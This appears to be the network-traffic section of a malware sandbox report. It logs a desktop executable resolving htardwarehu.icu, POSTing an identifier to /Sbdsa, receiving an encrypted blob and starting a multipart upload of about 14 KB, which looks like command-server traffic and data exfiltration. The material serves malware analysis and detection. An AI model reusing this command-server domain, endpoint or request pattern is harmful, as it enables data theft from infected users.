Mar 13, 2025 14:52:34.929475069 CET	443	49683	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:34.929770947 CET	443	49683	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:34.931132078 CET	49683	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:34.931268930 CET	49683	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:34.931318998 CET	443	49683	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:35.860515118 CET	443	49683	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:35.869482994 CET	49683	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:36.351608992 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:36.351666927 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:36.351727962 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:36.352140903 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:36.352153063 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:37.629192114 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:37.629287958 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:37.630601883 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:37.630613089 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:37.630861044 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:37.632050991 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:37.632210016 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:37.632235050 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:37.632292986 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:37.632299900 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:38.431555986 CET	443	49684	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:38.431929111 CET	49684	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:38.670517921 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:38.670581102 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:38.670763969 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:38.671001911 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:38.671010971 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:39.953767061 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:39.953860044 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:39.955197096 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:39.955204010 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:39.955518961 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:39.956826925 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:39.957010984 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:39.957050085 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:39.957103014 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:39.957112074 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:40.932777882 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:40.932883024 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:40.932960033 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:40.933192968 CET	49685	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:40.933206081 CET	443	49685	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:41.457873106 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:41.457921028 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:41.458067894 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:41.458354950 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:41.458365917 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:42.828901052 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:42.828983068 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:42.830400944 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:42.830410004 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:42.830805063 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:42.832132101 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:42.832288980 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:42.832319975 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:43.790790081 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:43.790888071 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:43.790966988 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:43.791263103 CET	49686	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:43.791282892 CET	443	49686	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:44.264466047 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:44.264504910 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:44.264588118 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:44.264916897 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:44.264933109 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.629687071 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.629853010 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.631206036 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.631218910 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.631465912 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.644366980 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.645204067 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.645246029 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.645354033 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.645376921 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.645481110 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.645520926 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.645642996 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.645668983 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.645803928 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.645832062 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.645982981 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646003962 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646009922 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646055937 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646145105 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646171093 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646190882 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646219969 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646313906 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646336079 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646362066 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646384954 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646387100 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646398067 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646401882 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646444082 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646476984 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646501064 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:45.646521091 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:45.646533966 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:48.507030964 CET	443	49687	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:48.507302046 CET	49687	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:48.519002914 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:48.519057989 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:48.519144058 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:48.519442081 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:48.519455910 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:49.890345097 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:49.890414000 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:49.891999006 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:49.892016888 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:49.892322063 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:49.893732071 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:49.893732071 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:49.893817902 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:50.613110065 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:50.625246048 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:50.625315905 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:50.625432014 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:50.625456095 CET	443	49689	104.21.48.1	192.168.2.8
Mar 13, 2025 14:52:50.625472069 CET	49689	443	192.168.2.8	104.21.48.1
Mar 13, 2025 14:52:50.625478029 CET	443	49689	104.21.48.1	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 14:52:31.061956882 CET	59971	53	192.168.2.8	1.1.1.1
Mar 13, 2025 14:52:31.084233999 CET	53	59971	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 14:52:31.061956882 CET	192.168.2.8	1.1.1.1	0xdaed	Standard query (0)	htardwarehu.icu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 14:52:31.084233999 CET	1.1.1.1	192.168.2.8	0xdaed	No error (0)	htardwarehu.icu	104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 14:52:31.084233999 CET	1.1.1.1	192.168.2.8	0xdaed	No error (0)	htardwarehu.icu	104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 14:52:31.084233999 CET	1.1.1.1	192.168.2.8	0xdaed	No error (0)	htardwarehu.icu	104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 14:52:31.084233999 CET	1.1.1.1	192.168.2.8	0xdaed	No error (0)	htardwarehu.icu	104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 14:52:31.084233999 CET	1.1.1.1	192.168.2.8	0xdaed	No error (0)	htardwarehu.icu	104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 14:52:31.084233999 CET	1.1.1.1	192.168.2.8	0xdaed	No error (0)	htardwarehu.icu	104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 14:52:31.084233999 CET	1.1.1.1	192.168.2.8	0xdaed	No error (0)	htardwarehu.icu	104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

htardwarehu.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49682	104.21.48.1	443	7024	C:\Users\user\Desktop\nyojpsdfkawed.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 13:52:32 UTC	265	OUT	POST /Sbdsa HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 41 Host: htardwarehu.icu
2025-03-13 13:52:32 UTC	41	OUT	Data Raw: 75 69 64 3d 62 34 35 63 39 34 34 34 35 31 63 37 34 62 31 32 34 32 62 37 35 61 33 37 63 62 61 30 31 37 64 33 26 63 69 64 3d Data Ascii: uid=b45c944451c74b1242b75a37cba017d3&cid=
2025-03-13 13:52:33 UTC	789	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 13:52:33 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3iLIi0USXpASACfy0nfjYIg2Od4IItsIOKGZZY1PbztsbQZzGPXjm8p%2FA2XVGwKFhYDOc66LrcSQIJWek3S%2BZfc10LNcdZajeO%2B%2Ffb680jweD%2Boozbe9Jku0mX%2BSMDY2gk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fc032c4f8dc59a-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10823&min_rtt=9841&rtt_var=4470&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=942&delivery_rate=206341&cwnd=251&unsent_bytes=0&cid=6a81f6bc851d5c6b&ts=928&x=0"
2025-03-13 13:52:33 UTC	580	IN	Data Raw: 58 52 cd 87 55 01 81 48 15 d3 d4 8c d5 68 e9 3f 4a 10 35 44 6f 7d f4 78 3e 3b ca 50 7a 17 4b 62 7e 1d d3 9a 43 75 1a d2 07 0d 6c b7 46 c4 54 77 80 7d 9a ce 95 ae ee 00 25 9b 85 8b ff 1e e4 4f 8a 04 79 d8 ad 38 b5 3f 1b 4b 59 4d ff 04 34 06 c9 b4 f0 f0 59 3e 6e e7 56 5a 42 eb 83 05 48 4a 65 81 34 b4 1b de b8 4c a6 f8 f3 3b ef 36 d0 a3 3c 45 27 b4 09 4c 13 53 89 d7 db d7 5f c1 8e 6a 79 4e b6 fc f6 a2 0e 2f 0d ef 10 26 d0 d1 e7 31 83 ea a7 27 a7 66 40 b1 cc d9 5a cd c8 7b 5c 30 08 46 7b f9 39 6a 26 26 8a 40 00 e9 59 da 0c 8d 5a 01 3f cc f7 89 55 11 31 40 2a cb 30 c5 ca 6a d5 8f 43 95 6c 0a bf 06 dd 3a 2c 14 d9 59 c6 f3 76 36 66 82 68 ee 25 76 58 d1 b2 ae 4c 60 28 99 9e f3 c2 fb 66 29 97 d6 c6 72 9b d5 d8 5f d9 bc 74 fe c6 cb d6 5f e3 46 ba db d5 6d 0f f9 14 Data Ascii: XRUHh?J5Do}x>;PzKb~CulFTw}%Oy8?KYM4Y>nVZBHJe4L;6<E'LS_jyN/&1'f@Z{\0F{9j&&@YZ?U1@*0jCl:,Yv6fh%vXL`(f)r_t_Fm
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: ef e0 68 09 f9 92 47 e3 09 f8 53 ad e8 04 95 1d a7 93 59 bc eb c3 70 3f 5a 2b 6e 90 c2 1d 0f f5 74 69 f7 ee 8a 5b 1f 25 6f c0 55 84 e0 ab 53 25 1d e3 d1 5c 26 65 e7 82 f5 ea 27 6b e9 dc 64 e5 f0 8c db 88 60 84 a3 5d 1b 86 5e ce 03 15 df 20 2e ec ab cc f7 65 8d 3a ae 9d 9f 35 47 d4 d6 9a b1 d7 d7 97 30 58 1d b5 82 f4 87 59 5c 66 30 52 ae aa 95 f6 92 70 2a 77 3c 69 e2 d4 99 6a cd d7 a4 83 d5 1d 42 80 26 da f1 cf bf 94 65 ea 67 3c cf 72 8f b2 1f 2f ec a7 9f 52 54 2f 44 0b 9e d0 1d 65 3d 1c 1a c2 01 61 39 86 a5 72 a0 6b 35 f9 d4 c7 03 60 00 5a 12 6a e2 53 e9 3e 4c ca ba c0 e9 91 ce 16 9a 94 8d c6 04 c2 9c 96 0c 8b ec 7e 30 86 6c fd 22 58 1b 7d 56 25 20 e1 22 4e d0 5b f4 2b f1 fc 1a d0 14 a3 38 66 7c 5a 25 c5 fd ef f6 4f 0c b3 fe 78 f8 f4 90 12 11 4e b2 82 7e Data Ascii: hGSYp?Z+nti[%oUS%\&e'kd`]^ .e:5G0XY\f0Rp*w<ijB&eg<r/RT/De=a9rk5`ZjS>L~0l"X}V% "N[+8f\|Z%OxN~
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: 69 d8 b5 4c 02 fd 4f c7 8f 16 0b 4d 3c cc 8e 2f 6c e8 e5 9c 0e 5d d0 d4 a3 b9 b5 c1 2a ec 7a cf 15 7e 7f 5a 3c f0 a3 01 8a 3a 42 3e 2b 4e 75 52 27 47 13 d3 26 60 ee a8 b1 06 c4 c2 fd 9f 01 12 08 0d da c3 75 e6 44 b4 37 cf a8 52 a8 15 dc d8 3f 6b 81 db 71 b6 e2 d0 39 36 66 5e c7 98 1f 4a c3 63 81 3c 9c ea 5e 51 d3 b5 9c 95 bb 2b fa b2 9b d5 c4 e0 8f c9 c8 8d f4 15 ea 86 87 35 e7 d4 fc 02 a2 22 a1 36 00 76 a0 35 e0 50 91 7f cd 0b eb d3 46 e6 df 34 f6 a8 36 b9 f5 53 c4 b3 79 b0 9c ea 6f 1f 75 3d c8 d2 d7 aa 93 6e a7 e9 c4 ef 2b 05 d7 15 8f df bd 21 65 8e 87 68 11 f8 9a 50 17 39 34 7c 8d 72 8f 18 1e 2e 8e 8c 8d cc 4c 75 b9 56 fa 1f ba a5 aa ec 5f d7 3e 78 09 20 b4 9d ed 71 f2 f9 0d 39 17 3e 48 6e ae 84 a3 46 e7 cf 7a 3b ef f4 1a df 78 f3 ad 4f 4f ce e3 f6 24 Data Ascii: iLOM</l]*z~Z<:B>+NuR'G&`uD7R?kq96f^Jc<^Q+5"6v5PF46Syou=n+!ehP94\|r.LuV_>x q9>HnFz;xOO$
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: 04 a8 40 45 fc c8 c9 5e 63 31 8d 0d be 52 31 e3 b8 a3 6a e2 d6 4a 2c e5 e0 4b d3 29 53 93 70 9b dd 25 0d 93 3d 80 76 24 93 70 77 02 9f e5 4e 66 0d a3 a2 09 ed 3e 93 85 5e 49 7f e0 a8 6d 48 35 0b 34 cb 34 80 3b ca 48 da 3c 84 59 60 f2 7e d2 d7 e2 c6 c5 02 a4 32 b9 5a b3 86 92 c6 d8 84 10 9d 54 4b 8e 85 b6 80 94 f3 f1 da cb 8a db fb 58 37 6e c2 d7 6a b4 2b bb ac 47 fc 90 f1 bb 2c 62 07 ee b1 1d 12 4b ef 8b 77 69 01 b5 b9 a6 d6 ca 72 c9 31 36 8f f2 da 57 cc b0 62 f9 dc 47 f2 df bb 77 2b 85 d0 1e e6 5a 81 00 5c e0 4d 13 2d ee b1 c4 50 db 32 e3 be a5 15 2b f1 01 ef c2 d8 2f 96 42 e1 41 44 aa 8c 32 74 1f 53 40 9b 68 30 d5 a3 f1 a2 86 a8 39 45 4a cf 8f 87 de 03 41 5a 91 48 d4 f2 53 77 51 bd e9 ea 13 d3 27 a1 a3 db d4 d9 c7 48 27 40 fc 0e b5 22 ae 2e 06 7b 72 b6 Data Ascii: @E^c1R1jJ,K)Sp%=v$pwNf>^ImH544;H<Y`~2ZTKX7nj+G,bKwir16WbGw+Z\M-P2+/BAD2tS@h09EJAZHSwQ'H'@".{r
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: 99 57 b4 10 86 a9 e7 21 d7 49 7c eb 0a 11 b0 51 9e 24 1d 59 33 5a 6b 93 38 19 af 34 71 81 97 2d 06 5d ee 36 78 45 9e 8c 4d 04 45 25 5f bb e9 26 ea b1 d9 cd ff 3b 57 10 fc ca 62 a8 3f e0 7b 98 ed 9a dd f6 89 64 d0 78 90 8f e7 e6 08 cb 07 3f 22 ac 13 70 61 8a 2c eb 4f 6b 53 3c a8 88 75 18 35 d6 46 d5 b9 2e 7a fd cd 18 3c 18 0f 4e 9b ce 28 3a 1f 1c b0 83 80 36 35 17 35 23 a7 a5 27 10 09 a6 63 1d fb 09 9f 3b ce da f5 6b 40 6c 3f 05 79 6d 8c cf 16 78 c7 37 49 e1 e4 e6 31 25 9d 39 09 1d 3a ed 09 17 a3 11 09 4c 13 46 d4 15 7f 46 20 6b 9d 0a 4b c7 23 af 07 d3 e4 0d db 33 ee 39 14 5b 65 d7 b1 21 7d 63 39 b5 e1 10 3b 03 10 99 29 65 91 fc 2e 79 1e 2e e0 07 17 3b 98 a9 0a a3 8b d4 13 34 d3 39 b1 bc 82 11 7e 7e ed 66 27 21 98 0b 63 9f ff 8c 98 a1 74 27 db 0e 87 9e 31 Data Ascii: W!I\|Q$Y3Zk84q-]6xEME%_&;Wb?{dx?"pa,OkS<u5F.z<N(:655#'c;k@l?ymx7I1%9:LFF kK#39[e!}c9;)e.y.;49~~f'!ct'1
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: 1a 4e 81 b0 e8 38 81 d9 b7 83 2d c2 05 3b 32 f6 4a b7 5c 34 38 13 e5 8a 22 b3 aa f5 eb 11 1f 94 d3 50 6f ea ec fb 45 2b cb 63 d3 03 5a 16 f9 f8 a8 ca 04 43 56 ec 1d 15 14 1a ce 4d 25 26 3c 6f 88 9b 22 a0 44 6f 49 dd 3a 89 29 37 f2 46 32 10 0d 85 c0 61 48 ec ec 47 32 bf 05 4e b4 b5 61 90 3c fc 3b 9e 8a 9b 5d 85 9a 6c 0d bf de fe 74 3d 97 be 4a 48 24 c1 e7 02 e3 af 63 07 5f 76 e2 7c 7d 11 f1 b6 57 1a 83 8e 71 f9 78 7b fd 9e a3 63 7f 75 e0 f0 fc 7c 73 19 81 d6 4d 07 7b f2 f2 d1 00 df a2 cd 36 e0 b8 0d eb 2b 76 b2 6e 1b 24 a0 64 a6 f0 22 eb 7e 52 8d b2 c2 2d 7e de 0e 16 9c 80 43 a5 ac 1c 1d 5a bf 65 36 7c a1 34 49 4c 85 83 47 04 0e b3 e1 f6 68 bd 6e e3 bf c6 90 e9 54 90 0e e2 64 f3 8c f1 46 90 c1 95 f1 1c 49 76 d5 a6 a6 5d af 77 41 1a 7a ad c8 3b 04 d7 89 04 Data Ascii: N8-;2J\48"PoE+cZCVM%&<o"DoI:)7F2aHG2Na<;]lt=JH$c_v\|}Wqx{cu\|sM{6+vn$d"~R-~CZe6\|4ILGhnTdFIv]wAz;
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: 5c 46 33 9c f1 0e f2 e6 fd df f6 73 28 f2 34 5e ad 2a 70 ca d0 48 e6 e6 88 83 84 45 f9 a5 7b ef ff dc a6 c3 14 51 9b 5a e3 d2 f2 2a 3e 2d 56 98 12 84 c2 33 4d 3f 67 e1 54 cf b5 dc 0b 6e ed 24 db 03 9c f0 b0 d0 07 0e a9 39 c5 e7 a7 73 19 ee 53 47 75 6a 95 9b a9 3f d9 b8 b9 82 fb a0 82 18 ec c9 dd eb 39 1d 60 4f b4 1b 67 6b 7f 1e 08 e8 67 46 7e 80 09 c7 3c 49 be 43 ee d7 9c a3 6b f4 ac 83 1d 1a 9d d0 be 4a f3 ca 79 34 76 a4 dd 28 7e 2c 7c fe 4b 35 5f 85 01 6b a5 26 36 17 ab d5 73 a2 0b a0 ed ea 16 ca d9 cb 4d ec 36 73 29 13 b8 10 c1 62 4d f6 71 23 29 6c b3 cf 55 68 5f 8b 60 5b ac 69 2a 89 62 00 c3 4c b7 fc ec 4c 05 28 fb 89 f8 43 68 2f 5b 35 f3 b1 43 b8 00 bd be e8 30 1f c4 cf 13 76 53 ab 66 3c c3 31 30 83 10 35 6d a0 73 26 63 a5 95 c2 ec 90 b8 63 a6 64 a7 Data Ascii: \F3s(4^pHE{QZ>-V3M?gTn$9sSGuj?9`OgkgF~<ICkJy4v(~,\|K5_k&6sM6s)bMq#)lUh_`[i*bLL(Ch/[5C0vSf<105ms&ccd
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: 83 04 20 ab ca 53 ca 33 34 a5 e0 89 2b c9 90 48 86 72 52 61 1b 74 86 4c 3f d9 1b 8e 6e aa 5c f0 10 30 1c 3b a2 b3 15 0a 18 39 84 72 20 9c 90 22 84 eb 58 ca 24 a3 45 8c 66 08 42 1c 18 f1 4a ee 33 e5 d2 70 a5 fe dd 5c d9 29 a5 1b 63 09 58 28 07 67 ad 9e 5f 43 b4 de b8 24 bf 2b 6b ad 66 67 40 15 f9 a9 1d 4f 1b 5c 9c 90 0b 05 64 3d dc bf 7f 53 cd 06 e4 da 90 7f fc 0d 23 2d 5b c9 38 4d 8a 73 b8 77 ee c2 41 68 88 5b 6e ad ea 08 9e f8 91 20 50 1e 2e 6f 9b 2d ca 9a 26 36 32 a3 10 17 c1 a4 31 37 5a 31 ad de df 65 56 5a 38 80 4f f8 bc 47 6e 7c 3d a9 6c 41 8d 28 8b 22 8d 22 5a 1f 1c 55 79 d9 e2 c6 98 eb 32 7d 73 2e b8 55 a5 60 49 46 e1 4a e7 64 4c d7 81 5a 15 43 82 97 54 94 b9 74 7d fd e0 60 e1 7b b2 3d 9c 63 39 de 0e a2 15 30 16 e5 16 a2 83 b9 a6 c9 b9 4b 90 53 90 Data Ascii: S34+HrRatL?n\0;9r "X$EfBJ3p\)cX(g_C$+kfg@O\d=S#-[8MswAh[n P.o-&6217Z1eVZ8OGn\|=lA(""ZUy2}s.U`IFJdLZCTt}`{=c90KS
2025-03-13 13:52:33 UTC	1369	IN	Data Raw: 26 1b 42 ac f6 86 ec bb 02 a9 e2 de b8 bd e7 59 cd 3c 01 ec 8a 51 67 a5 35 8f df 85 ac e9 34 e5 e9 d0 6a 56 cf d8 5c 93 21 5c bc b6 e3 39 bd 93 e8 2e e9 26 b2 5d d7 bb dd f0 45 d4 ad 2a 18 79 23 0c 85 63 12 47 29 c2 3a 33 0c fd 80 26 4e 66 65 1a af b7 48 ad 7f e4 13 71 cf 8e de 66 5c 9a 29 68 29 a3 63 5c c6 87 af 18 ea c8 8d 5b b4 75 18 7f 58 d7 c6 a8 ab e2 9d 5a 19 7a 2e 63 78 63 17 8e 34 ad 59 8c b8 94 a9 b6 36 ff cb 1f 1b 89 6a 41 6f d1 36 1b 4b 05 4e e8 22 b1 6d e9 20 84 b6 36 3d 6b 21 d4 ce 2b d3 8d 04 65 7d 28 d7 3d e6 42 08 d4 39 56 e5 5c 7a 62 fc 90 bb 30 7c 1d db 4e 7d 43 ff fd b4 ae 2e a3 cb e3 ed a0 d6 27 e9 33 4e 3f 44 b5 14 9e a4 1b 0a 48 eb b4 db 14 96 58 5c dc 29 90 e8 e4 2c f0 a1 e2 c1 fd da 4e 50 69 7b 30 b0 42 00 6a 45 01 fb 85 0b ce 28 Data Ascii: &BY<Qg54jV\!\9.&]E*y#cG):3&NfeHqf\)h)c\[uXZz.cxc4Y6jAo6KN"m 6=k!+e}(=B9V\zb0\|N}C.'3N?DHX\),NPi{0BjE(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49683	104.21.48.1	443	7024	C:\Users\user\Desktop\nyojpsdfkawed.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 13:52:34 UTC	273	OUT	POST /Sbdsa HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0hbyXIo5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14461 Host: htardwarehu.icu
